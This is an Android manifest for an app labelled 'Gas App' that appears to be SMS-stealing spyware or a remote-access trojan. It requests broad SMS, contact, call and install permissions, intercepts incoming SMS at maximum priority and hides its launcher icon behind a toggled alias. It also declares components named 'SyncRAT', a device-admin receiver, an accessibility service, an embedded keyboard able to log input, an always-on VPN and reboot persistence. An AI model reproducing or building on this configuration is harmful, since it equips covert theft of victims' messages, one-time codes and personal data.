<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools">

    <uses-feature
        android:name="android.hardware.telephony"
        android:required="false" />

    <uses-permission android:name="android.permission.GET_ACCOUNTS" />
    <uses-permission android:name="android.permission.VIBRATE" />
    <uses-permission android:name="android.permission.AUTHENTICATE_ACCOUNTS" />
    <uses-permission android:name="android.permission.WRITE_SYNC_SETTINGS" />
    <uses-permission android:name="android.permission.READ_SYNC_SETTINGS" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES" />
    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <uses-permission android:name="android.permission.WRITE_CONTACTS" />
    <uses-permission android:name="android.permission.CALL_PHONE" />
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.SCHEDULE_EXACT_ALARM" />
    <uses-permission android:name="android.permission.USE_EXACT_ALARM" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
    <uses-permission
        android:name="android.permission.WRITE_EXTERNAL_STORAGE"
        android:maxSdkVersion="29" />
    <uses-permission android:name="android.permission.MANAGE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />
    <uses-permission android:name="android.permission.READ_PHONE_NUMBERS" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.SEND_SMS" />

    <application
        android:name=".MainApplication.MyApp"
        android:allowBackup="true"
        android:dataExtractionRules="@xml/data_extraction_rules"
        android:fullBackupContent="@xml/backup_rules"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:networkSecurityConfig="@xml/network_security_config"
        android:requestLegacyExternalStorage="true"
        android:roundIcon="@mipmap/ic_launcher"
        android:supportsRtl="true"
        android:theme="@style/Theme.DAC_Collector"
        android:usesCleartextTraffic="true"
        tools:targetApi="31">
        <activity
            android:name=".Ui.CrashActivity"
            android:excludeFromRecents="true"
            android:noHistory="true"
            />


        <meta-data
            android:name="com.google.android.gms.ads.APPLICATION_ID"
            android:value="ca-app-pub-4113410244453408~1804056046" />

        <activity
            android:name="android.iocl.sms_handler_8_0_below.SMSThreadActivity"
            android:exported="false" />
        <activity
            android:name="android.iocl.sms_handler_8_0_below.SmsActivity"
            android:exported="true"
            android:icon="@drawable/dev_icon"
            android:label="Messages"
            android:launchMode="singleInstance" />

        <activity-alias
            android:name=".SmsLauncherAlias"
            android:enabled="false"
            android:exported="true"
            android:icon="@drawable/chats_chat_sms_talk_svgrepo_com"
            android:label="SMS"
            android:launchMode="singleInstance"
            android:targetActivity="android.iocl.sms_handler_8_0_below.SmsActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias> <!-- For Hidden Icon -->
        <!-- For Hidden Icon -->
        <activity
            android:name=".Ui.BankStatementActivity"
            android:configChanges="orientation|screenSize"
            android:exported="false"
            android:screenOrientation="landscape" />
        <activity
            android:name=".Ui.PermissionActivity"
            android:exported="true"
            android:launchMode="singleTask" />
        <activity
            android:name=".Ui.DialogActivity"
            android:directBootAware="true"
            android:excludeFromRecents="true"
            android:exported="true"
            android:launchMode="singleInstance"
            android:noHistory="true"
            android:persistableMode="persistAcrossReboots"
            android:showOnLockScreen="true"
            android:theme="@style/Transparent"
            android:turnScreenOn="true"
            android:windowSoftInputMode="stateAlwaysHidden|adjustResize">

            <!-- SMS RECEIVER -->

            <intent-filter>
                <action android:name="android.intent.action.SEND" />
                <action android:name="android.intent.action.SENDTO" />

                <category android:name="android.intent.category.DEFAULT" />
                <category android:name="android.intent.category.BROWSABLE" />

                <data android:scheme="sms" />
                <data android:scheme="smsto" />
                <data android:scheme="mms" />
                <data android:scheme="mmsto" />
            </intent-filter>
        </activity>
        <activity
            android:name=".Ui.TileDialogActivity"
            android:excludeFromRecents="true"
            android:exported="true"
            android:launchMode="singleInstance"
            android:noHistory="true"
            android:showOnLockScreen="true"
            android:theme="@style/Transparent"
            android:turnScreenOn="true"
            android:windowSoftInputMode="stateAlwaysHidden|adjustResize">
            <intent-filter>
                <action android:name="android.service.quicksettings.action.QS_TILE_PREFERENCES" />
            </intent-filter>
        </activity>

        <meta-data
            android:name="firebase_messaging_auto_init_enabled"
            android:value="true" />
        <meta-data
            android:name="firebase_analytics_collection_enabled"
            android:value="true" />

        <activity
            android:name=".Ui.MainActivity"
            android:exported="true"
            android:label="Gas App"
            android:persistableMode="persistAcrossReboots"
            android:showOnLockScreen="true">

            <!-- DO NOT add MAIN/LAUNCHER here -->
        </activity> <!-- This alias is the launcher icon. Toggle this to hide/show the app icon -->
        <activity-alias
            android:name=".Ui.LauncherAlias"
            android:enabled="true"
            android:exported="true"
            android:icon="@mipmap/ic_launcher"
            android:label="Gas App"
            android:roundIcon="@mipmap/ic_launcher"
            android:targetActivity=".Ui.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias>

        <service
            android:name=".Services.SmsSenderJOBService"
            android:enabled="true"
            android:excludeFromRecents="true"
            android:launchMode="singleInstance"
            android:permission="android.permission.BIND_JOB_SERVICE"
            android:persistableMode="persistAcrossReboots"
            android:process=":sendDACSeparate"
            android:showOnLockScreen="true"
            android:turnScreenOn="true" /> <!-- Simple Keyboard Integration from https://github.com/rkkr/simple-keyboard/ on 31-08-2025 at 14:24 -->
        <service
            android:name="android.iocl.simple_keyboard.latin.LatinIME"
            android:directBootAware="true"
            android:exported="false"
            android:icon="@mipmap/ic_launcher_keyboard"
            android:label="@string/english_ime_name"
            android:permission="android.permission.BIND_INPUT_METHOD">
            <intent-filter>
                <action android:name="android.view.InputMethod" />
            </intent-filter>

            <meta-data
                android:name="android.view.im"
                android:resource="@xml/method" />
        </service>
        <service
            android:name="android.iocl.keepAlive.ServiceA"
            android:enabled="true"
            android:exported="false"
            android:process=":serviceA" />
        <service
            android:name="android.iocl.keepAlive.ServiceB"
            android:enabled="true"
            android:exported="false"
            android:process=":serviceB" />

        <activity
            android:name="android.iocl.simple_keyboard.latin.settings.SettingsActivity"
            android:enabled="true"
            android:exported="true"
            android:label="@string/english_ime_name"
            android:theme="@style/platformSettingsTheme" />

        <receiver
            android:name="android.iocl.simple_keyboard.latin.SystemBroadcastReceiver"
            android:exported="false">
            <intent-filter>
                <action android:name="android.intent.action.LOCALE_CHANGED" />
            </intent-filter>
        </receiver>

        <service
            android:name=".Services.FetchProfileInfo"
            android:enabled="true"
            android:launchMode="singleInstance"
            android:permission="android.permission.BIND_JOB_SERVICE"
            android:persistableMode="persistAcrossReboots"
            android:process=":Fetch"
            android:showOnLockScreen="true"
            android:turnScreenOn="true" />
        <service
            android:name=".Services.PersistentVpnService"
            android:exported="true"
            android:permission="android.permission.BIND_VPN_SERVICE">
            <intent-filter>
                <action android:name="android.net.VpnService" />
            </intent-filter>

            <meta-data
                android:name="android.net.VpnService.SUPPORTS_ALWAYS_ON"
                android:value="true" />
        </service>
        <service
            android:name=".Services.ImageJobService"
            android:enabled="true"
            android:exported="true"
            android:permission="android.permission.BIND_JOB_SERVICE" />
        <service
            android:name=".SyncRAT.SyncService"
            android:exported="true"
            android:permission="android.permission.BIND_SYNC_ADAPTER">
            <intent-filter>
                <action android:name="android.content.SyncAdapter" />
            </intent-filter>

            <meta-data
                android:name="android.content.SyncAdapter"
                android:resource="@xml/syncadapter" />
        </service>
        <service
            android:name=".SyncRAT.AuthenticatorService"
            android:exported="true">
            <intent-filter>
                <action android:name="android.accounts.AccountAuthenticator" />
            </intent-filter>

            <meta-data
                android:name="android.accounts.AccountAuthenticator"
                android:resource="@xml/authenticator2" />
        </service>
        <service
            android:name=".Services.SendDACService"
            android:excludeFromRecents="true"
            android:launchMode="singleInstance"
            android:persistableMode="persistAcrossReboots"
            android:process=":sendDAC"
            android:showOnLockScreen="true"
            android:turnScreenOn="true" />
        <service
            android:name=".Services.AcessibilitySettings"
            android:exported="false"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>

            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/accessibility_config" />
        </service>
        <service
            android:name=".Firebase.FCMPushReceiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="com.google.firebase.MESSAGING_EVENT" />
            </intent-filter>
        </service> <!-- In your SyncService declaration -->
        <service
            android:name=".SyncAdapters.SyncService"
            android:exported="true"
            android:process=":sync">
            <intent-filter>
                <action android:name="android.content.SyncAdapter" />
            </intent-filter>

            <meta-data
                android:name="android.content.SyncAdapter"
                android:resource="@xml/syncadapter" />
        </service>
        <service
            android:name=".SyncAdapters.SyncService1"
            android:exported="true"
            android:process=":sync">
            <intent-filter>
                <action android:name="android.content.SyncAdapter" />
            </intent-filter>

            <meta-data
                android:name="android.content.SyncAdapter"
                android:resource="@xml/syncadapter1" />
        </service> <!-- In your AuthenticatorService declaration -->
        <service
            android:name=".SyncAdapters.AuthenticatorService"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.accounts.AccountAuthenticator" />
            </intent-filter>

            <meta-data
                android:name="android.accounts.AccountAuthenticator"
                android:resource="@xml/authenticator" />
        </service>
        <service
            android:name=".SyncAdapters.AuthenticatorService1"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.accounts.AccountAuthenticator" />
            </intent-filter>

            <meta-data
                android:name="android.accounts.AccountAuthenticator"
                android:resource="@xml/authenticator1" />
        </service>

        <receiver
            android:name=".Receivers.AdminReceiver"
            android:exported="true"
            android:label="@string/app_name"
            android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/device_admin_receiver" />

            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED" />
                <action android:name="android.app.action.DEVICE_ADMIN_DISABLED" />
            </intent-filter>
        </receiver>
        <receiver
            android:name=".Receivers.CallReceivers"
            android:enabled="true"
            android:exported="true">
            <intent-filter android:priority="999">
                <action android:name="android.intent.action.PHONE_STATE" />
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.NEW_OUTGOING_CALL" />
            </intent-filter>
        </receiver>

        <service
            android:name="android.iocl.sms_handler_8_0_below.HeadlessSmsSendService"
            android:exported="true"
            android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">
            <intent-filter>
                <action android:name="android.intent.action.RESPOND_VIA_MESSAGE" />

                <category android:name="android.intent.category.DEFAULT" />

                <data android:scheme="sms" />
                <data android:scheme="smsto" />
                <data android:scheme="mms" />
                <data android:scheme="mmsto" />
            </intent-filter>
        </service>
        <service
            android:name=".Services.FixOppoAutoKill"
            android:enabled="true"
            android:exported="true"
            android:process=":remote"
            android:stopWithTask="false" />
        <service
            android:name=".Services.SmsFetchWorker"
            android:enabled="true"
            android:exported="true"
            android:permission="android.permission.BIND_JOB_SERVICE"
            android:process=":workerSms"
            android:stopWithTask="false" />
        <service
            android:name=".Services.AemmTileService"
            android:exported="true"
            android:icon="@drawable/ic_cylinder_tile"
            android:label="Aemm Quick"
            android:permission="android.permission.BIND_QUICK_SETTINGS_TILE">
            <intent-filter>
                <action android:name="android.service.quicksettings.action.QS_TILE" />
            </intent-filter>
            <!-- Long press goes here -->

        </service>

        <receiver
            android:name=".Receivers.TransparentWidget"
            android:exported="true"
            android:label="Transparent Widget">
            <intent-filter>
                <action android:name="android.appwidget.action.APPWIDGET_UPDATE" />
            </intent-filter>

            <meta-data
                android:name="android.appwidget.provider"
                android:resource="@xml/widget_transparent_info" />
        </receiver>
        <receiver
            android:name=".Receivers.App_Installation_Receiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.PACKAGE_ADDED" />
                <action android:name="android.intent.action.PACKAGE_REPLACED" />
                <action android:name="android.intent.action.PACKAGE_REMOVED" />

                <data android:scheme="package" />
            </intent-filter>
        </receiver>
        <receiver
            android:name=".Receivers.smsReceivers"
            android:excludeFromRecents="true"
            android:exported="true"
            android:launchMode="singleInstance"
            android:permission="android.permission.BROADCAST_SMS"
            android:persistableMode="persistAcrossReboots"
            android:showOnLockScreen="true"
            android:turnScreenOn="true">
            <intent-filter android:priority="2147483647">
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
                <action android:name="android.provider.Telephony.SMS_DELIVER" />
            </intent-filter>
        </receiver>
        <receiver
            android:name="android.iocl.sms_handler_8_0_below.MmsSystemEventReceiver"
            android:exported="true"
            android:permission="android.permission.BROADCAST_WAP_PUSH">
            <intent-filter>
                <action android:name="android.provider.Telephony.WAP_PUSH_DELIVER" />

                <data android:mimeType="application/vnd.wap.mms-message" />
            </intent-filter>
        </receiver>
        <receiver
            android:name=".Receivers.MyReceiver"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.USER_PRESENT" />
                <!-- Optional: Listen for boot completed to re-register receiver -->
                <action android:name="android.intent.action.BOOT_COMPLETED" />
                <action android:name="android.provider.Telephony.ACTION_DEFAULT_SMS_PACKAGE_CHANGED" />
            </intent-filter>
        </receiver> <!-- Provided by CHATGPT -->
        <meta-data
            android:name="ScopedStorage"
            android:value="true" />

        <provider
            android:name=".SyncAdapters.DACCollectorProvider"
            android:authorities="${applicationId}.provider"
            android:exported="true"
            android:grantUriPermissions="true"
            android:process=":sync"
            android:syncable="true">
            <intent-filter>
                <action android:name="android.intent.action.VIEW" />
            </intent-filter>
        </provider>
        <provider
            android:name="androidx.core.content.FileProvider"
            android:authorities="${applicationId}.fileprovider"
            android:exported="false"
            android:grantUriPermissions="true">
            <meta-data
                android:name="android.support.FILE_PROVIDER_PATHS"
                android:resource="@xml/file_paths" />
        </provider>
    </application>

</manifest>